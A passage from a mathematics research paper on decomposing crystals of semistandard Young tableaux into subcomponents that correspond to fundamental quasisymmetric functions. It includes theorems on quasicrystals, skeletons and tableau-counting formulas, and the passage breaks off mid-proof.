quasisymmetric functions and Schur functions, and relations between them, has the potential of greatly advancing our understanding of plethysm. We propose here a study of Schur functions and fundamental quasisymmetric functions through crystal theory. We believe this to be of value, since both plethysm and crystal theory originate from representation theory. A _crystal_ is a visual representation of the character of a representation of a group in the shape of a labelled oriented graph on combinatorial objects. Irreducible characters then correspond to connected components of crystals, which then are crystals in their own right. A good introductory reference on crystals is _Crystals for dummies_[Shimozono, 2005]. For a thorough understanding, see _Crystal Bases_[Bump and Schilling, 2017]. We will focus on crystals of type \(A_{n-1}\), which correspond to characters of representations of \(GL_{n}\), which themselves are given by symmetric functions: formal power series such that permuting any two variables gives the same function. The Schur functions mentionned above encode the irreducible characters for \(GL_{n}\). The problem of decomposing a symmetric function into the basis of Schur functions then corresponds to breaking down a character (and the associated representation) into its smallest pieces: irreducible characters (or representations). In the setting of crystals, we are interested in understanding the decomposition of crystals into connected components \(B(\lambda)_{n}\), which then correspond to the Schur functions \(s_{\lambda}(x_{1},\ldots,x_{n})\). Furthermore, the following formula of Gessel [Gessel, 2019] tells us that these connected components can be decomposed further into subcomponents which then correspond to fundamental quasisymmetric functions. \[s_{\lambda}=\sum_{T\in\mathrm{SYT}(\lambda)}F_{DesComp(T)}\] Understanding this decomposition in the crystal setting is the first aim of the article. The second aim is to understand the added structure on quasisymmetric functions within the crystal structure, and relations between them. We show the following. **Theorem 1 :** The connected crystal \(B(\lambda)_{n}\) of tableaux of shape \(\lambda\) and maximal entry \(n\) is partitionned into disjoint connected induced subgraphs \(B(T_{\alpha})_{n}\) which correspond to quasisymmetric functions \(F_{\alpha}(x_{1},\ldots,x_{n})\), where the subsets of vertices are tableaux with a fixed descent composition \(\alpha\). The sources \(T_{\alpha}\) of these subcomponents have filling and _minimal parsing of type \(\alpha\)_. The number \(f_{\alpha}^{\lambda}\) of subgraphs of type \(\alpha\) is the number of standard tableaux of shape \(\lambda\) and descent composition \(\alpha\). As a consequence of the following theorem, we have that for a fixed composition \(\alpha\), all subcomponents \(B(T_{\alpha})_{n}\) are isomorphic as labelled oriented graphs (see corollary 3.2). Moreover this is true no matter the crystal \(B(\lambda)_{n}\) they live in, so no matter the shapes of the sources \(T_{\alpha}\). We denote the class of such subcomponents \(B(\alpha)_{n}\), and call them _quasicrystals_. We can then study their graph structure: **Theorem 2 :** Let \(\alpha\) be a composition of \(m\) in \(s\) parts. The quasicrystal \(B(\alpha)_{n}\) is isomorphic (as an oriented graph) to \(B(m)\) with maximal entry \(n-s+1\). In particular, the oriented graph structure of \(B(\alpha)_{n}\) is independant of partitions \(\lambda\) for which \(\alpha\) is a descent composition. An application of both theorems above, and of proposition 3.6, is the following formula, giving the number of tableaux with fixed shape \(\lambda\) and maximal entry \(n\). **Theorem 3 :** The number of tableaux of shape \(\lambda\) with maximal entry \(n\) is given by \[|SSYT(\lambda)_{n}|=\sum_{0\leq d\leq D}f_{d}^{\lambda}\cdot\left(\begin{array} []{c}|\lambda|+n-d-1\\ n-d-1\end{array}\right),\] where \(f_{d}^{\lambda}\) denotes the number of standard tableaux of shape \(\lambda\) with \(d\) descents, and \(D\) is the maximal number of descents in a standard tableau of shape \(\lambda\). The existence of "nice" formulas for counting tableaux has been an open question for many years. For the similar problem of giving a "nice" formula for Kostka numbers \(K_{\mu}^{\lambda}\), open for many years, it has been conjectured that no "nice" formula exists, given the chaotic behavior of those numbers [Stanley and Fomin, 1999] (see the discussion on mathoverflow on this question [Morales, 2010], viewed a thousand times and with contributions from experts). There is however a known combinatorial formula below, using descents, which had only a bijective proof. The setting of quasicrystals allowed us to give it a constructive proof. **Proposition 0.1 (Proposition 3.12 [Sagan, 2001, Proposition 5.3.6] ) :** The Kostka number \(K_{\mu}^{\lambda}\) counting tableaux of shape \(\lambda\) and composition weight \(\mu\) is given by the following formula, where \(\alpha\preccurlyeq\mu\) if \(\mu\) is a refinement of \(\alpha\). \[K_{\mu}^{\lambda}=|\{T\in SYT(\lambda)\ |\ DesComp(T)\preccurlyeq\mu\}|\] After studying the structure of the quasicrystals \(B(\alpha)\), we go back to studying the structure of the crystal \(B(\lambda)\). **Theorem 4 :** Subcomponents \(B(T_{\alpha})\) and \(B(T_{\stackrel{{\mbox{\tiny-}}}{{\alpha}}})\) necessarily appear in pairs in a given crystal \(B(\lambda)\). They are then dual one to another (as graphs) and are positionned in dual locations within \(B(\lambda)\), with the anti-automorphism of crystal between both being the evacuation map. By replacing each subcomponent \(B(T_{\alpha})\) in \(B(\lambda)_{n}\) by the associated standard tableau, and preserving only the edges of minimal index between subcomponents, we obtain what we call the skeleton of \(B(\lambda)_{n}\), denoted \(Skeleton(\lambda)_{n}\). **Theorem 5 :** For \(\lambda\vdash m\) fixed, let \(S\) be the maximal length of a descent composition for tableaux of shape \(\lambda\). Then the skeletons \(Skeleton(\lambda)_{n}\) of the crystals \(B(\lambda)_{n}\) are equal for all \(n\geq S\). For \(1\leq n\leq S\), the skeleton of \(B(\lambda)_{n}\) is the induced subgraph of \(Skeleton(\lambda)_{S}\) containing standard tableaux of shape \(\lambda\) with descent composition having at most \(n\) parts. The skeleton is then determined for all \(n\), and we can define \(Skeleton(\lambda)=Skeleton(\lambda)_{S}\) to be the skeleton of \(B(\lambda)\), thus giving its underlying structure. We conjecture that the (unoriented and unlabelled) graph structure of the skeleton contains that of the dual equivalence graph for \(\lambda\), introduced by Assaf [3] (see conjecture 5.3). We also conjecture that the induced subgraph of the skeleton holding standard tableaux with fixed number of descents have interesting structures (see conjecture 4.10). The third aim of the article is to give some applications to plethysm of the results above (see section 6), notably counting monomials in plethysms \(s_{\mu}[s_{\lambda}]\) and understanding how a (symmetric) sum of quasicrystals can be regrouped into connected components associated to Schur functions. To do the latter, we introduce an elegant algorithm. This algorithm is not more efficient than others curently in use, but its structure may help understand better plethysm. Figure 1 illustrates the corresponding connected components of crystals of \(GL_{n}\) on words and tableaux, with words appearing as skew tableaux whose rows are their maximal weakly increasing factors. Figure 1: Isomorphic connected components of crystals on words and tableaux Background ### Crystals on words Recall that a _word (of length \(k\) on \(n\))_ is a sequence of \(k\) letters \(w\in[n]^{\otimes k}\) on the alphabet \([n]=\{1,2,\ldots,n\}\). We say a word \(w\) has _weight_\(\beta=(\beta_{1},\beta_{2},\ldots,\beta_{n})\) where \(\beta_{i}\) counts occurences of the letter \(i\) in \(w\). One can define _crystal operators \(e_{i}\) and \(f_{i}\) on words_, for \(1\leq i<n\). A general description is that \(e_{i}\) changes a letter \(i+1\) into an \(i\), or is null, as \(f_{i}\) changes an \(i\) into an \(i+1\), or is null, and if \(e_{i}\), \(f_{i}\) are not null, then \(e_{i}\circ f_{i}=f_{i}\circ e_{i}=Id\). The exact action of \(e_{i}\) and \(f_{i}\) on words is described using the following _parenthesis rule_: 1. Each letter \(i\) is associated to a parenthesis ), and each letter \(i+1\), to a parenthesis (. 2. Coupled parenthesis are removed to obtain a sequence of uncoupled parenthesis )\({}^{\phi_{i}}\)(\({}^{\epsilon_{i}}\). 3. \(e_{i}\) acts on the letter \(i+1\) corresponding to the leftmost uncoupled parenthesis (, and \(f_{i}\) acts on the letter \(i\) corresponding to the rightmost uncoupled parenthesis ). **Example 1.1 :** Let \(w=1331233312233\), and \(i=1\). The associated sequence of parenthesis is \(\begin{array}{cccccccccccccccc}1&3&3&1&2&3&3&3&1&2&2&3&3&3\\ \end{array}\), which is reduced to \(\begin{array}{cccccccccccc}1&3&3&1&2&3&3&3&1&2&2&3&3\\ \end{array}\), which is reduced to \(\begin{array}{cccccccccccc}1&3&3&1&2&3&3&3&1&2&2&3&3\\ \end{array}\) by removing coupled parenthesis. Then \(f_{1}(w)=1332233312233\) and \(e_{1}(w)=13312233311233\). A _crystal on words_ is then a labelled oriented graph on words where the edges \(w\to w^{\prime}\) are labelled by \(i\) if \(f_{i}(w)=w^{\prime}\). See figure 1 for an example of a crystal on words. ### Crystals on tableaux #### 1.2.1 Tableaux and Schur functions Recall that _partitions_ are weakly decreasing positive integer vectors \(\lambda=(\lambda_{1},\lambda_{2},\ldots,\lambda_{\ell})\). If the sum of the parts of \(\lambda\) gives \(m\), then we say that \(\lambda\) is a _partition of \(m\)_, noted \(\lambda\vdash m\) or \(|\lambda|=m\), and use \(\ell(\lambda)=\ell\) to denote its number of parts, or length. We identify the partitions with their _Young diagram_, the top- and left-justified array of boxes with \(\lambda_{i}\) boxes in the \(i^{th}\) row. A _tableau of shape \(\lambda\)_ is a filling of the cells of \(\lambda\) with integers. We say that a tableau is _semistandard_ if the entries weakly increase along rows from left to right, and increase down columns. A tableau is said to be _standard_ if it is semistandard and entries \(1\) to \(|\lambda|\) appear exactly once. Unless otherwise stated, we use the word tableau for semistandard tableau. The _weight_ (or _filling_) of a tableau is the composition \(\gamma=(\gamma_{1},\gamma_{2},\ldots)\) where \(\gamma_{i}\) counts its entries \(i\). To a tableau it is possible to associate a word by using a fixed reading order. We use the _row reading order_, noted \(rw\): we read rows from left to right, starting with the last row, and ending with the first. **Example 1.2 :**\(t=\young(1,1,2,3,4)\) is a tableau of shape \((5,4,2,1)\) and weight \((2,3,3,2,2)\). Its row reading word is \(rw(t)=534223511234\). To a tableau \(t\) of weight \(\gamma\), it is also possible to associate the monomial \(x^{t}=x_{1}^{\gamma_{1}}x_{2}^{\gamma_{2}}x_{3}^{\gamma_{3}}\cdot\ldots\). This gives the connection between tableaux and _Schur functions_: the Schur function associated to a partition \(\lambda\) is \(s_{\lambda}=\sum_{t\in SSYT(\lambda)}x^{t}\), where \(SSYT(\lambda)\) is the set of all tableaux of shape \(\lambda\). The cells containing entries \(i\) in a tableau form a _horizontal band_: each column contains at most one entry \(i\), and reading the tableau left to right, each new cell with content \(i\) must be weakly North-East (NE) to the preceeding ones. We say the NE-most cell of a horizontal band is its head, and its SW-most cell, its tail. We say a horizontal band (containing a certain number of entries, up to entries \(i\)) is _maximal_ if adding the "next" horizontal band (of entries \(i+1\)) is not a horizontal band anymore. We call the set of maximal horizontal bands of a tableau its _minimal parsing_, and say it has _type_\(\alpha\) if the length of the \(i^{\rm th}\) maximal horizontal band is given by \(\alpha_{i}\). Among the tableaux with a fixed minimal parsing of type \(\alpha\), there is a unique one which also has weight \(\alpha\), obtained by filling the \(i^{\rm th}\) maximal horizontal band by entries \(i\), for all \(i\). We denote these tableaux \(T_{\alpha}\). **Example 1.3 :** Let \(T=\young(1,1,3,5)\) and \(T^{\prime}=\young(1,1,2,3,3)\), where the maximal horizontal bands of the two tableaux are distinguished. \(T\) has minimal parsing of type \((2,3,3,1)\), and its horizontal bands (of individual entries \(i\)) are not all maximal. The tableau \(T_{(2,3,3,1)}\) with same minimal parsing appears in example 1.5. For its part, \(T^{\prime}\) has minimal parsing of type \((2,3,6)\), and all its horizontal bands are maximal. It is then equal to \(T_{(2,3,6)}\) for this specific minimal parsing of type \((2,3,6)\). The integer vector \(\alpha=(\alpha_{1},\alpha_{2},\ldots,\alpha_{s})\) giving the length of the maximal horizontal bands in a tableau is what we'll call its _descent composition_. This corresponds to the traditional notion of descent composition (in standard tableaux), as we see below. Using the minimal parsing allows us to _standardize a tableau_: entries in the first maximal horizontal band are relabelled by \(1\) to \(\alpha_{1}\), the ones in the second, by \(\alpha_{1}+1\) to \(\alpha_{1}+\alpha_{2}\), etc. This gives the same result as standardizing a tableau through its reading word, as seen below. For standard tableaux, we can consider their _descents_: entries \(i\) such that \(i+1\) appears in a row of greater index. To descent sets, we can associate bijectively a _descent composition_: if \(\{i_{1}<i_{2}<\ldots<i_{k}\}\) is the descent set of a standard tableau with \(m\) cells, then \(\alpha=(i_{1},i_{2}-i_{1},i_{3}-i_{2},\ldots,m-i_{k})\) is the associated descent composition. It is a composition of \(m\), and gives the lengths of the maximal horizontal bands of the standard tableau. There is then a unique semistandard tableau with weight \(\alpha\) and same minimal parsing as the standard tableau. This gives the following. **Proposition 1.4 :** Semistandard tableaux with minimal parsing of type and weight \(\alpha\) are in bijection with standard tableaux with descent composition \(\alpha\). **Example 1.5 :** The tableau \(T_{(2,3,3,1)}=\young{1123}{223}\) standardizes to \(std(T_{(2,3,3,1)})=\young{1258}{347}\). This standard tableau has descent set \(\{2,5,8\}\), and descent composition \((2,3,3,1)\). The descent composition then gives the lengths of the maximal horizontal bands in \(T_{(2,3,3,1)}\) and \(std(T_{(2,3,3,1)})\). Note that all tableaux with the same minimal parsing of type \((2,3,3,1)\), like the tableau \(T\) in example 1.3, standardize to \(std(T_{(2,3,3,1)})\). We will see in section 1.3 that descent compositions are used to define fundamental quasisymmetric functions, which are central to our study. The _descents of a word_\(w\) are the positions \(i\) such that \(w_{i}>w_{i+1}\). The descent composition of a word \(w\) corresponds to the lengths of maximal weakly increasing factors in \(w\). Words can then be standardized uniquely in a way that preserves descents: entries \(i\) of \(w\) are replaced from left to right by entries \(\beta_{1}+\beta_{2}+\ldots+\beta_{i-1}+1\) to \(\beta_{1}+\beta_{2}+\ldots+\beta_{i}\), where \(\beta_{j}\) counts letters \(j\) in \(w\). A tableau \(T\) can be standardized by standardizing its reading word \(rw(T)\), which gives the same result as above. #### 1.2.2 Crystals of tableaux _Crystal operators_ on tableaux are defined as applying the (word) crystal operators on its reading word, and changing the corresponding entry in the tableau. Tableaux obtained in this way are always semistandard [10]. These crystal operators define an oriented graph structure on the set of semistandard tableaux, where there is an arrow from \(T\) to \(T^{\prime}\) labelled \(i\) if \(T^{\prime}=f_{i}(T)\). Since only entries change and the shape is fixed, the connected components regroup all the tableaux of the same shape \(\lambda\) which we denote \(B(\lambda)_{n}\) if the fixed maximal entry is \(n\). It then corresponds to the irreducible character \(\chi^{\lambda}\) of \(GL_{n}\) given by the Schur function \(s_{\lambda}(x_{1},x_{2},\ldots,x_{n})\). More generally, we can also consider the infinite graph \(B(\lambda)\) corresponding to \(s_{\lambda}\). The unique source vertex of \(B(\lambda)\) (and any \(B(\lambda)_{n}\)) is the tableau of shape and filling \(\lambda\), which we denote \(1_{\lambda}\). Note that it corresponds to \(T_{\lambda}\). For example, \(1_{(5,4,2)}=T_{(5,4,2)}=\)\(\young(1,1,1,1,1)\)\(\young(2,2,2,2)\). Crystals of tableaux are especially important to study, because any connected crystal of type \(A_{n-1}\) is isomorphic to a crystal of tableau: **Theorem 1.6** ([Bump and Schilling, 2017]): **:** For any connected Stembridge crystal \(C\) for \(GL_{n}(\mathbb{C})\) (of type \(A_{n-1}\)), there is a unique source. Its weight is a partition \(\lambda\) and \(C\simeq B(\lambda)\). Crystals of words and of tableaux are strongly linked through the Robinson-Schensted-Knuth (RSK) algorithm, jeu de taquin, and the plactic and coplactic monoids (see section 5). ### Fundamental quasisymmetric functions and descent compositions The ring of quasisymmetric functions \(QSym\), introduced by Gessel, generalizes and contains the ring of symmetric functions [Gessel, 1984]. We will consider the basis of \(QSym\) given by the _fundamental quasisymmetric functions_, which are indexed by compositions: \[F_{\alpha}=\sum_{\alpha\prec\beta}M_{\beta},\,\mbox{where}\,\,M_{\beta}=\sum_{ i_{1}<i_{2}<\ldots<i_{k}}x_{i_{1}}^{\beta_{1}}x_{i_{2}}^{\beta_{2}}\ldots x_{i_{k}}^{ \beta_{k}},\] and \(\alpha\preccurlyeq\beta\) indicates that \(\beta\) is a refinement of \(\alpha\): adjacent parts of \(\beta\) can be summed to obtain \(\alpha\). The \(M_{\beta}\) are _monomial quasisymmetric functions_, and also form a basis of \(QSym\). For example, \(\beta_{1}=(2,1,3,2,4,1)\) and \(\beta_{2}=(1,1,3,1,2,1,1,1,1,1,)\) are distinct, but incomparable, refinements of \(\alpha=(2,4,2,5)\). Therefore \(M_{\beta_{1}}\) and \(M_{\beta_{2}}\) both appear in \(F_{\alpha}\). Schur functions (which are also quasisymetric functions) then decompose in the basis of fundamental quasisymmetric functions. We will use the decomposition below, proved recently by Gessel in a short article [Gessel, 2019], by using horizontal bands in standard tableaux, there called runs, and an involution acting on them. \[s_{\lambda}=\sum_{T\in SYT(\lambda)}F_{DesComp(T)}.\] Decomposing a crystal into subcomponents corresponding to fundamental quasisymmetric function We now show how the above formula (\(*\)) expressing \(s_{\lambda}\) as a sum of fundamental quasisymmetric functions \(F_{\alpha}\) induces a decomposition of the crystal of tableaux \(B(\lambda)\). Each subcomponent of the decomposition would then correspond precisely to one of the \(F_{\alpha}\) appearing in (\(*\)). We remark that crystal operators on tableaux do not necessarily preserve descent compositions. This is because changing the value of entries can modify the maximal horizontal bands along with the weight of the tableau. However, tableaux of the same parsing will be grouped together in connected subcomponents of \(B(\lambda)\): **Proposition 2.1 :** The set of tableaux of shape \(\lambda\) with a fixed parsing of type \(\alpha\) form a connected induced subgraph of \(B(\lambda)\). Its source is the tableau \(T_{\alpha}\) with filling and (same) minimal parsing of type \(\alpha\), and its vertices give the monomials appearing in \(F_{\alpha}\). An example of the decomposition can be seen in figure 2. Proof.: Let's consider the definition of \(F_{\alpha}\). If \(T_{\alpha}\) is a tableau of filling and parsing into horizontal bands of type \(\alpha\), then \(x^{T_{\alpha}}=x^{\alpha}\) appears in \(M_{\alpha}\subseteq F_{\alpha}\), since \(\alpha\preccurlyeq\alpha\). Now, any refinement \(\alpha\preccurlyeq\beta\) gives a (non-)minimal parsing of the same maximal horizontal bands. Any filling \(\gamma\) obtained from \(\beta\) by (potentially) adding zero parts gives a valid filling of the same (non-)maximal horizontal bands, and the associated monomial will appear in \(M_{\beta}\). In particular, \(\alpha\preccurlyeq\beta\preccurlyeq\gamma\). Therefore, the set of tableaux of shape \(\lambda\) with fixed minimal parsing of type \(\alpha\) (and any weight \(\alpha\preccurlyeq\gamma\)) gives all monomials of \(F_{\alpha}\). Crystal operators \(f_{i}\), for \(1\leq i\leq n-1\), modify the weight of tableaux by \(b_{i+1}-b_{i}\), where \(b_{i}\) is the vector with zeros everywhere except in position \(i\). If a tableau \(T\) of weight \(\gamma\) has minimal parsing of type \(\alpha\), then \(f_{i}(T)\) has the same parsing if and only if \(\alpha\preccurlyeq\gamma+(b_{i+1}-b_{i})\). This follows from the above discussion. The set of tableaux with the same minimal parsing, and so the same descent composition \(\alpha\), form a subset of the vertices of \(B(\lambda)\). Among these tableaux, there is only one with filling \(\alpha\), \(T_{\alpha}\). We will now show that every tableau in the subset of vertices can be obtained by a certain sequence of crystal operators from \(T_{\alpha}\), thus showing that the induced subgraph is connected, and that \(T_{\alpha}\) is its source. Let \(T\) be a tableau of weight \(\gamma\) with the same parsing of type \(\alpha\), then there is a set of sets of consecutive parts of \(\gamma\) such that the sum of the parts in every set gives a part of \(\alpha\). Let \[\{\{\gamma_{1},\gamma_{2},\ldots,\gamma_{k_{1}}\},\{\gamma_{k_{1}+1},\ldots, \gamma_{k_{2}}\},\ldots,\{\gamma_{k_{s-1}+1},\ldots,\gamma_{k_{s}}\}\}\] be such a set of sets, with \(k_{1}<k_{2}<\ldots<k_{s}=\ell(\gamma)\), so \(\sum_{j=k_{r-1}+1}^{k_{r}}\gamma_{j}=\alpha_{r}\) for \(1\leq r\leq s=\ell(\alpha)\). Then the following sequence of crystal operators applied to \(T_{\alpha}\) gives \(T\): \[\begin{array}{c}(f_{1})^{\gamma_{2}}\circ(f_{2}\circ f_{1})^{\gamma_{3}} \circ(f_{3}\circ f_{2}\circ f_{1})^{\gamma_{4}}\circ\ldots\circ(f_{k_{1}-1} \circ\ldots\circ f_{2}\circ f_{1})^{\gamma_{k_{1}}}\circ\ldots\circ\\ (f_{k_{(j-1)}}\circ\ldots\circ f_{j+1}\circ f_{j})^{\gamma_{k_{(j-1)}+1}} \circ\ldots\circ(f_{k_{j-1}}\circ\ldots\circ f_{j+1}\circ f_{j})^{\gamma_{k }}\circ\ldots\circ\\ (f_{k_{(s-1)}}\circ\ldots\circ f_{s+1}\circ f_{s})^{\gamma_{k_{(s-1)}+1}} \circ\ldots\circ(f_{k_{s}-1}\circ\ldots\circ f_{s+1}\circ f_{s})^{\gamma_{k }}\quad(T_{\alpha})\quad=\quad T.\end{array}\] This sequence changes entries in the last horizontal band first, then in the previous to last, etc. until the entries in the first maximal horizontal band are changed, and the obtained tableau is \(T\). Moreover, it is straightforward to see that every intermediate tableau also has the same minimal parsing into horizontal bands. Finally, the labelled oriented subgraph on tableaux with the same minimal parsing of type \(\alpha\), with labels of edges given by the application of crystal operators which preserve minimal parsing, gives a connected _induced_ subgraph of \(B(\lambda)\). This is because crystal operators which preserve the minimal parsing remain crystal operators, and if there is an edge between two tableaux in the subset, then the crystal operator applied preserves the minimal parsing. \(\blacksquare\) **Remark 2.2 :** The induced subgraphs are not generally crystals. They are however isomorphic (as oriented graphs) to crystals \(B(\mu)\) after re-labelling of vertices and oriented edges, as we will see in section 3. We denote the induced subgraphs of \(B(\lambda)\) with minimal parsing of type \(\alpha\) by \(B(T_{\alpha})\), where the tableaux \(T_{\alpha}\) are the source vertices. Note that there may be many subcomponents associated to the same composition \(\alpha\), which means that \(F_{\alpha}\) occurs more than once in \(s_{\lambda}\). In particular, this is simply because there can be many ways to decompose \(\lambda\) into maximal horizontal bands of respective lengths \(\alpha_{i}\). We will see in the next section that all subcomponents associated to the same composition \(\alpha\) are in fact isomorphic. **Theorem 1 :** The connected crystal \(B(\lambda)_{n}\), of tableaux of shape \(\lambda\) and maximal entry \(n\), is partitionned into disjoint connected induced subgraphs \(B(T_{\alpha})\) which correspond to quasisymmetric functions \(F_{\alpha}(x_{1},\ldots,x_{n})\), where the subsets of vertices are tableaux with a fixed descent composition \(\alpha\). The sources \(T_{\alpha}\) of these subcomponents have filling and minimal parsing of type \(\alpha\). The number \(f_{\alpha}^{\lambda}\) of subgraphs of type \(\alpha\) is the number of standard tableaux of shape \(\lambda\) and descent composition \(\alpha\). **Example 2.3 :** Figure 2 shows the decomposition of \(B(4,3)_{4}\), into subcomponents associated to quasisymmetric functions. Those associated to a descent composition \(\alpha\) appear in the same color as that associated to \(\stackrel{{\leftarrow}}{{\alpha}}\). We show in section 4 that pairs of subcomponents associated respectively to descent compositions \(\alpha\) and \(\stackrel{{\leftarrow}}{{\alpha}}\) are positionned dualy in the crystal. Figure 2: Decomposition of \(B(4,3)_{4}\) into its subcomponents associated to fundamental quasissymmetric functions \(F_{\alpha}\): \(s_{(4,3)}=F_{(4,3)}+F_{(3,4)}+F_{(3,3,1)}+F_{(2,4,1)}+F_{(3,2,2)}+2\cdot F_{(2,3,2)}\) \(+F_{(2,3,3)}+F_{(2,2,3)}+F_{(1,4,2)}+F_{(1,3,3)}+F_{(2,2,2,1)}+F_{(1,3,2,1)}+F_{( 1,2,3,1)}+F_{(1,2,2,2)}\). Proof of theorem 1.: The minimal parsing is uniquely determined for any tableau, so the sets of tableaux with given minimal parsing are disjoint. As we have seen above, each of these sets induce a connected subgraph of \(B(\lambda)\) with source \(T_{\alpha}\), and the monomials associated to these tableaux form a quasisymmetric functions \(F_{\alpha}\). Finally, the sources \(T_{\alpha}\) are put in bijection with standard tableaux of descent compositions \(\alpha\) and same minimal parsing by using proposition 1.4. By the formula of Gessel,this confirms that we get the right number of subcomponents associated to each \(F_{\alpha}\) in \(B(\lambda)\). **Proposition 2.4 :** Compositions \(\alpha=(\alpha_{1},\alpha_{2},\ldots,\alpha_{s})\) which appear as descent compositions of tableaux in \(B(\lambda)_{n}\), for \(\lambda=(\lambda_{1},\lambda_{2},\ldots\lambda_{\ell})\vdash m\), have the following properties. 1. \(1\leq\alpha_{i}\leq\lambda_{1}\), 2. \(\alpha_{1}+\alpha_{2}+\ldots+\alpha_{j}\leq\lambda_{1}+\lambda_{2}+\ldots+ \lambda_{j}\) for all \(j\), 3. \(s\leq(\lambda_{2}+\lambda_{3}+\ldots+\lambda_{\ell})+1\), 4. \(\ell\leq s\leq n\), 5. \(s\leq k\). Proof.: 1. The \(\alpha_{i}\)'s describe lengths of maximal horizontal bands, and each has at most one cell in every column of \(\lambda\). Then \(\alpha_{i}\leq\lambda_{1}\), since \(\lambda_{1}\) is the number of columns spanned by \(\lambda\). Moreover, by the maximality of (maximal) horizontal bands, \(\alpha_{i}\geq 1\). 2. In order to be maximal, the horizontal band of \(i\)'s must have its tail on a row of larger index than that on which lies the head of the horizontal band of \((i+1)\)'s. Then the \(j\) first horizontal bands span at most \(j\) rows and their cells. 3. The first horizontal band is necessarily of shape \((\alpha_{1})\). This gives us the \(+1\). The maximal number of horizontal bands possible occurs if every new horizontal band has a single cell on the next non-fully filled row, and the rest of its cells on the rows above. 4. The first inequality follows from the discussion on the second condition. The second inequality follows from the fact that the composition \(\alpha\) also gives the weight of a tableau \(T_{\alpha}\) of shape \(\lambda\) by the above proposition. Then \(s\leq n\), since \(n\) is the maximal entry allowed in tableaux of \(B(\lambda)_{n}\), as a crystal of \(GL_{n}\), and \(\alpha_{s}\) indicates the number of entries \(s\) in a source \(T_{\alpha}\). 5. There cannot be more non-zero parts to the weight of a tableau than the number of cells in it. **Remark 2.5 :** For \(\lambda\vdash m\) fixed, not all the compositions of \(m\) with the properties above are descent composition for \(\lambda\). For example, for \(\lambda=(3,3)\), \(\alpha=(1,2,3)\) has all the properties above, however, there are no semistandard tableau of shape \(\lambda\) with minimal parsing \(\alpha\). **Conjecture 2.6 :** Let \(\lambda\) be the weakly decreasing reordering of the parts of \(\alpha\). Then \(F_{\alpha}\) occurs in \(s_{\lambda}\). In particular, all reorderings \(\alpha\) of \(\lambda\) appear as descent compositions for \(\lambda\), with \(F_{\alpha}\) in \(s_{\lambda}\). This has been tested, and found to be true, for all compositions of \(m\), untill \(m=6\). Quasicrystal structure of a subcomponent associated to a fundamental quasisymmetric function \(F_{\alpha}\) We have seen in theorem 1 that subcomponents \(B(T_{\alpha})\) associated to a fundamental quasisymmetric function \(F_{\alpha}\) form induced subgraphs of crystals. This notion of induced subgraph of crystal has not been studied by the mathematical community to our knowledge. We push this further by studying the structure of these subcomponents. In this section, we prove that all subcomponents associated to a composition \(\alpha\) are isomorphic, no matter their crystal host \(B(\lambda)_{n}\). We denote that class of subcomponents by \(B(\alpha)_{n}\), and call them _quasicrystals_. The quasicrystals \(B(\alpha)_{n}\) are not crystals of type \(A_{n-1}\), one reason being that they are not self-dual in general. They may however be Kashiwara crystals for other groups. It would be interesting to investigate which groups (and the associated representations) might have such a crystal structure. ### Oriented graph structure of quasicrystals \(B(\alpha)_{n}\) **Theorem 2 :** Let \(\alpha\) be a composition of \(m\) in \(s\) parts. The quasicrystal \(B(\alpha)_{n}\) is isomorphic (as an oriented graph) to \(B(m)\) with maximal entry \(n-s+1\). In particular, the oriented graph structure of \(B(\alpha)_{n}\) is independant of partitions \(\lambda\) for which \(\alpha\) is a descent composition. In order to prove this theorem, we need to introduce the original definition of quasisymmetric functions of Gessel [Gessel, 1984], which is in terms of subsets \(I\subseteq\{1,2,\ldots,m-1\}\). To do this, we use the bijection between descent sets \(I\) and descent compositions \(\alpha\) defined before proposition 1.4: if \(\alpha=(\alpha_{1},\ldots,\alpha_{s})\), then the associated set is \(I_{\alpha}=\{j_{1},j_{2},\ldots,j_{s-1}\}\) where \(j_{i}=\alpha_{1}+\ldots+\alpha_{i}\). Then \[F_{\alpha}(x_{1},\ldots,x_{n})=F_{I_{\alpha}}(x_{1},\ldots,x_{n})=\sum_{ \begin{subarray}{c}1\leq i_{1}\leq i_{2}\leq\ldots\leq i_{m}\leq n\\ \text{with }i_{j}<j_{j+1}\text{ if }j\in I_{\alpha}\end{subarray}}x_{i_{1}}x_{i_{2}} \ldots x_{i_{m}}.\] This definition is more generally used in the literature as the one given in the introduction. Proof of theorem 2.: A subcomponent \(B(T_{\alpha})\) in any crystal \(B(\lambda)_{n}\) corresponds to the quasisymmetric function \(F_{\alpha}(x_{1},\ldots,x_{n})\), since we restrict ourselves to a maximal entry \(n\). The tableaux in the crystal \(B(m)_{n-s+1}\) have a unique descent composition, \(\alpha=(m)\). Then, the whole crystal corresponds to the quasisymmetric function \(F_{(m)}(x_{1},\ldots,x_{n-s+1})\). Lets start by showing that the sets of monomials associated to both quasisymmetric functions above are in bijection. To do this, we use the original definition of quasisymmetric functions. Let's note that, for \(1\leq s\leq n\), \[F_{(m)}(x_{1},\ldots,x_{n-s+1})=F_{\varnothing}(x_{1},\ldots,x_{n-s+1})=\sum_{ 1\leq i_{i}\leq i_{2}\leq\ldots\leq i_{m}\leq n-s+1}x_{i_{1}}x_{i_{2}}\ldots x _{i_{m}}.\] The weakly increasing sequence of integers which index each monomial of \(F_{\varnothing}(x_{1},\ldots,x_{n-s+1})\) is in bijection with the weakly increasing sequence of integers indexing the monomials of any \(F_{I}\), with \(I=\{j_{1},\ldots,j_{s-1}\}\), through the following bijection. \[1\leq i_{i}\leq i_{2}\leq\ldots\leq i_{m}\leq n-s+1\] \[\downarrow\] \[1\leq i_{i}\leq\ldots\leq i_{j_{1}}<i_{j_{1}+1}+1\leq\ldots\leq i_{j_{2}}+1< i_{j_{2}+1}+2\leq\ldots\leq i_{j_{k}}+(k-1)<i_{j_{k}+1}+k\leq\] \[\ldots\leq i_{j_{s-1}}+(s-2)<i_{j_{s-1}+1}+(s-1)\leq\ldots\leq i_{m}+(s-1) \leq(n-s+1)+(s-1)=n.\] All possible sequences of indices in \(f_{I}\) can be retreived this way, and the strict ascents will be respected. One can find the initial sequence by removing \(i\) from each part between the \(i^{\rm th}\) and the \(i+1^{\rm th}\) increasing sign \(<\). Similarly as before, all sequences of \(F_{\varnothing}\) can be retreived this way. Lets now fix \(n,m\), \(1\leq s\leq n\), a composition \(\alpha\) of \(m\) in \(s\) parts, and any shape \(\lambda\vdash m\) in which \(\alpha\) appears as a descent composition. The sequences of indices above then give fillings of the maximal horizontal bands of type \(\alpha\) in \(\lambda\): indices \(i_{j}\) indexed by \(1\leq j\leq j_{1}\) fill the first horizontal band, indices \(i_{j}\) indexed by \(j_{1}+1\leq j\leq j_{2}\) fill the second horizontal band, etc. Let us replace the tableaux in the crystal 